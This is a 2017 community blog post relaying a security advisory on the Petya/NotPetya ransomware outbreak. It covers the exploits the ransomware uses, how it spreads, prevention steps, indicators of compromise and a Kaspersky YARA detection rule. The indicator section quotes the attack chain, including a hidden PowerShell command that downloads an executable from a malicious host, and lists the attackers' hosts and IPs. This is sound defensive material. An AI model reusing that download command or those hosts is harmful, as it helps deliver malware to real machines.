NASSCOM Community Admin

Petya Ransomware Updates

Blog Post created by NASSCOM Community Admin on Jun 28, 2017

Another wave of ransomware attacks have resulted in outbreak globally, impacting organizations across sectors – Banking, Transport, Energy, Utilities etc. Organizatons in Ukraine and Russia seems most impacted, and hits have also been registered in Poland, UK, Italy, Denmark, Spain, US. A few incidents have also been reported in India. DSCI team has been constantly engaging with Security Leaders across organizations on this, coordinating information and resources as exchanged in global community. They have also put together an advisory for members which is attached for your reference. The link is constantly getting updated with more insights: https://www.dsci.in/taxonomypage/1479 

 

 

Petya / Petrwrap / NotPetya / GoldenEye is a ransomware virus. Ransowmare is a type of malicious software designed to block access to a computer system until a sum of money is paid. This ransomware outbreak, though smaller than the previous WannaCry attack, has had a considerable impact. This is a new version of the Petya ransomware virus. It demands payment in bitcoin wallet and contains a personal Posteo email ID, wowsmith123456@posteo.net. It demands a ransom of $300 worth of Bitcoins.

 

What makes it dangerous?

Unlike other ransomware viruses, it encrypts the Master File Table (MFT) for NTFS partitions. Each file on an NTFS volume is represented by a record in a special file called the master file table (MFT). If the MFT is corrupted the file system structure on the disk becomes unusable. It also overwrites MBR (Master Boot Record) with a custom bootloader that shows a ransom note and prevents the victim from booting their computer. This means that once a machine is infected it is in a complete state of lockdown. In comparison, the WannaCry ransomware virus targeted only specific file extensions while still allowing the operating system access. 

 

This makes it more intrusive and completely locks down the victim machine. Also, unlike WannaCry, this ransomware does not have a kill switch. It also has the capability to steal login credentials and spread laterally. This is of major concern if the ransomware virus lands on machines with administrative privileges.

 

The above mentioned email ID has been shutdown, thus breaking the chain to obtain decryption keys for infected systems. This implies that even after the ransom is paid (though not recommended), there's no recourse to save the infected machines.

 

What vulnerabilities are exploited by Petya?

It uses the previously known SMB vulnerability, CVE-2017-0143 / MS17-010 (Eternal Blue). As per various open source reports and CERT-IN advisory, it also uses the CVE-2017-199 office RTF vulnerability to download and run the Petya installer. It combines both client-based and network-based attack.

 

How does it spread?

Petya spreads via spam emails. These emails contain malicious office documents which use the above mentioned vulnerability to download and run the Petya installer. The installer then executes the SMB work and spreads to new computers on the same network. It is also being reported that the ransomware virus spreads by stealing login credentials using WMIC / PSExec tools. Another infection vector are the software updates published by a little-known Ukrainian firm, MeDoc.

 

It is also reported to spread via The EternalRomance exploit – a remote code execution exploit targeting Windows XP to Windows 2008 systems over TCP port 445.

 

What is its impact?

So far the malware has been dominant in Ukraine. Incidents have also been reported in Russia, England, US, France, Norway, Israel, Poland, Germany, Italy, Belarus, Lithuania and India. It has affected various business outlets spread across multiple sectors. The affected entities include banks, telecom companies, metro railways, airports, power plants, oil plants, pharmaceutical companies, government departments, logistics companies, food conglomerates, law firms etc. It has also led to shutdown of shipping terminals across the world. A total of 2,000 machines are being reported to be infected by this virus across the world.

 

How to prevent infection?

Users and administrators are advised to take the following preventive measures to protect their computer networks from ransomware infection / attacks:

  • In order to prevent infection users and organizations are advised to apply patches to Windows systems as mentioned in Microsoft Security Bulletin MS17-010 (https://technet.microsoft.com/library/security/MS17-010) and June 2017 Security Update (https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/40969d56-1b2a-e711-80db-000d3a32fc99_ This fixes the CVE-2017-0199
  • Restrict execution of powershell /WSCRIPT/ PSEXEC / WMIC in enterprise environment Ensure installation and use of the latest version (currently v5.0) of PowerShell, with enhanced logging enabled. script block logging, and transcription enabled. Send the associated logs to a centralized log repository for monitoring and analysis.
  • Block the file C:\Windows\perfc.dat from running.
  • Microsoft Patch for Unsupported Versions such as Windows XP, Vista, Server 2003, Server 2008 etc. (http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598)
  • To prevent data loss Users & Organisations are advised to take backup of Critical Data
  • Block SMB ports on Enterprise Edge/perimeter network devices [UDP 137, 138 and TCP 139, 445] or Disable SMBv1. (https://support.microsoft.com/en-us/help/2696547)
  • Restrict TCP port 445 traffic to where it is absolutely needed using router ACLs
  • Use private VLANs if your edge switches support this feature
  • Use host based firewalls to limit communication on TCP 445, especially between workstations

 

Indicators of Compromise

Following are IOCs as reported by various security researchers and EY MIST Threat Alert Update (some of these are from unofficial sources and hence should be used with caution):

 

Email address associated with this ransomware:

wowsmith123456(@)posteo(.)net 

 

Ransomware spreading URL:

hxxp://benkow(.)cc

 

Bitcoin addresses:

1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX 

 

C&C payment servers: 

hxxp://mischapuk6hyrn72(.)onion/

hxxp://petya3jxfp2f7g3i(.)onion/

hxxp://petya3sen7dyko2n(.)onion/

hxxp://mischa5xyix2mrhd(.)onion/MZ2MMJ

hxxp://mischapuk6hyrn72(.)onion/MZ2MMJ

hxxp://petya3jxfp2f7g3i(.)onion/MZ2MMJ

hxxp://petya3sen7dyko2n(.)onion/MZ2MMJ

 

 Possible IP address

 185.165.29(.)78

84.200.16(.)242

111.90.139(.)247

95.141.115(.)108

 

Malware dropped files:

hxxp://185.165.29(.)78/~alex/svchost.exe

 

File Name Order-20062017.doc (RTF із CVE-2017-0199)

MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1

SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84 SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D26 File Size 6215 bytes

 

File Type Rich Text Format data

Connects to the host: 84.200.16.242 80

h11p://84.200.16.242/myguy.xls

File Name myguy.xls

MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25

SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73 SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63B6 File Size 13893 bytes

 

File Type Zip archive data

mshta.exe %WINDIR%\System32\mshta.exe" "C:\myguy.xls.hta" " (PID: 2324) powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://https://www.linkedin.com/redir/invalid-link-page?url=french-cooking%2ecom%2Fmyguy%2eexe', '%APPDATA%\10807.exe');" (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://https://www.linkedin.com/redir/invalid-link-page?url=french-cooking%2ecom%2Fmyguy%2eexe', '%APPDATA%\10807.exe') 10807.exe %APPDATA%\10807.exe" " (PID: 3096)

 

File Name BCA9D6.exe

 

MD5 Hash Identifier A1D5895F85751DFE67D19CCCB51B051A

 

SHA-1 Hash Identifier 9288FB8E96D419586FC8C595DD95353D48E8A060

SHA-256 Hash Identifier 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AFFBD

File Size 275968 bytes

 

Following IOCs are reported by Kaspersky Labs:

  • 71B6A493388E7D0B40C83CE903BC6B04
  • 0df7179693755b810403a972f4466afb
  • 42b2ff216d14c2c8387c8eabfb1ab7d0
  • E595c02185d8e12be347915865270cca
  • e285b6ce047015943e685e6638bd837e

 

Yara rules

rule ransomware_PetrWrap {

meta:

copyright = "Kaspersky Lab"

description = "Rule to detect PetrWrap ransomware samples"

last_modified = "2017-06-27"

author = "Kaspersky Lab"

hash = "71B6A493388E7D0B40C83CE903BC6B04"

version = "1.0"

strings:

$a1 = "MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu" fullword wide

$a2 = ".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls" fullword wide

$a3 = "DESTROY ALL OF YOUR DATA! PLEASE ENSURE THAT YOUR POWER CABLE IS PLUGGED" fullword ascii

$a4 = "1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX" fullword ascii

$a5 = "wowsmith123456@posteo.net." fullword wide

condition:

uint16(0) == 0x5A4D and

filesize < 1000000 and any of them }

 

Also, check the CERT in AdvisoryThis article will be updated as and when more information about the attack becomes available.

Outcomes